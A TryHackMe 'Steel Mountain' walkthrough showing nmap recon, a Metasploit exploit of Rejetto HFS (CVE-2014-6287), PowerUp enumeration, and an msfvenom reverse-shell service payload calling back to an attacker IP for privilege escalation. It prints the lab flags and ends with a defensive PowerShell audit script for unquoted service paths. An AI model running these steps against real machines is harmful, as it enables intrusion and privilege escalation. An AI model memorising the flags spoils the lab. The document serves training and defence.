TryHackMe — Steel Mountain Simple Writeup by Karthikeyan Nagaraj | Mr. Robot | 2023
2023-05-15 16:23:31


nmap -sC -sV <MACHINE-IP>


80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2023-05-09T12:58:47
|_Not valid after: 2023-11-08T12:58:47

8080/tcp open http HttpFileServer httpd 2.3

49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown



1. Who is the employee of the month?

Navigating to http://<Machine-IP>:80 shows a picture of a person (an actor from the Mr. Robot web series) presented as Bill Harper.

Inspecting the page source reveals his name.

Ans: Bill Harper



1. Scan the machine with nmap. What is the other port running a web server on?

Ans: 8080

2. Take a look at the other web server. What file server is running?

The banner only says HttpFileServer, but that is not the answer; the question wants the vendor's name.

Ans: Rejetto Http File Server

3. What is the CVE number to exploit this file server?

Ans: 2014-6287

4. Use Metasploit to get an initial shell. What is the user flag?

  1. Start Metasploit and search for rejetto:
search rejetto
use 0
show options

Also set the target port to 8080 with the command set RPORT 8080.

Running the exploit returns a Meterpreter shell.

2. Move to bill's home directory:

cd C:\\Users\\bill\\

3. Search for user.txt with the command search -f user.txt

4. Change into the directory it reports and read the file:

cd C:\\Users\\bill\\Desktop\\
cat user.txt

We found the flag:

Ans: b04763b6fcf51fcd7c13abc7db4fd365



1. Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

  1. Open a new terminal and download the PowerUp.ps1 PowerShell script

2. In the Meterpreter session, upload the file to the target machine (enter the path where you downloaded it), then load the PowerShell extension:

load powershell

3. Change into the directory holding the uploaded script and dot-source it so its functions are available, then run its checks:

. .\PowerUp.ps1
Ans: AdvancedSystemCareService9

2. What is the root flag?

Create a service-executable payload with msfvenom, stop the vulnerable service, and upload the payload over the service binary:

msfvenom -p windows/shell_reverse_tcp LHOST=<Attacker-IP> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
sc stop AdvancedSystemCareService9
upload Advanced.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

Received a connection on the listener.

Ans: 9af5f314f57607c00fd09803a587db80



1. What powershell -c command could we run to manually find out the service name?

The expected format is powershell -c "command here"

Ans: powershell -c Get-Service
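The two PowerShell answers above (PowerUp's unquoted-service-path finding and the manual Get-Service check) are covered by the following audit script. It is an added example, not part of the original writeup or of PowerUp: it lists every service whose binary path is unquoted and contains a space, shows the intermediate executables the service control manager would resolve before the real binary, flags whether any of their parent directories is writable by Everyone, Users or Authenticated Users, and emits the sc.exe command that quotes the path. Get-Service alone does not expose the binary path, so the script reads Win32_Service instead. Function names are our own; run it from an elevated PowerShell prompt on the host being audited.

```powershell
# Added example (not from the original writeup): audit Windows services for
# unquoted binary paths containing spaces and print the quoting fix.

function Test-BroadWriteAccess {
    # True when Everyone / Users / Authenticated Users hold a write bit on $Directory.
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $broad = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
    # WriteData (create files) is also set by Modify and FullControl.
    $writeBit = [System.Security.AccessControl.FileSystemRights]::WriteData
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.IdentityReference.Value -notin $broad) { continue }
        if ($ace.FileSystemRights -band $writeBit) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        # Quoted paths are safe; empty paths (kernel drivers etc.) are skipped.
        if ([string]::IsNullOrWhiteSpace($path) -or $path.StartsWith('"')) { return }

        # Separate the executable from trailing arguments so only the binary path is split.
        $exe      = if ($path -match '^(.*?\.exe)') { $Matches[1] } else { $path }
        $trailing = $path.Substring($exe.Length)
        if ($exe -notmatch ' ') { return }   # no space in the binary path: nothing to flag

        # Each space-delimited prefix (+ ".exe") is a candidate the SCM tries before the real binary.
        $candidates = @()
        $idx = $exe.IndexOf(' ')
        while ($idx -ge 0) {
            $candidates += $exe.Substring(0, $idx) + '.exe'
            $idx = $exe.IndexOf(' ', $idx + 1)
        }

        $writable = $candidates |
            ForEach-Object { Split-Path -Parent $_ } |
            Sort-Object -Unique |
            Where-Object { Test-BroadWriteAccess -Directory $_ }

        [PSCustomObject]@{
            Service        = $svc.Name
            StartMode      = $svc.StartMode
            RunsAs         = $svc.StartName
            PathName       = $path
            Candidates     = $candidates
            WritableParent = @($writable)
            # Remediation: wrap the binary path in quotes (paste into an elevated cmd.exe).
            Fix            = "sc.exe config `"$($svc.Name)`" binPath= `"\`"$exe\`"$trailing`""
        }
    }
}

Get-UnquotedServicePath | Format-List Service, StartMode, RunsAs, PathName, Candidates, WritableParent, Fix
```

A finding is only dangerous when a low-privileged user can write into one of the listed parent directories, which is why WritableParent is reported separately from Candidates; a path under Program Files with default ACLs shows up as unquoted but empty in that column. Applying the Fix string and restarting the service closes the gap regardless of directory permissions.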
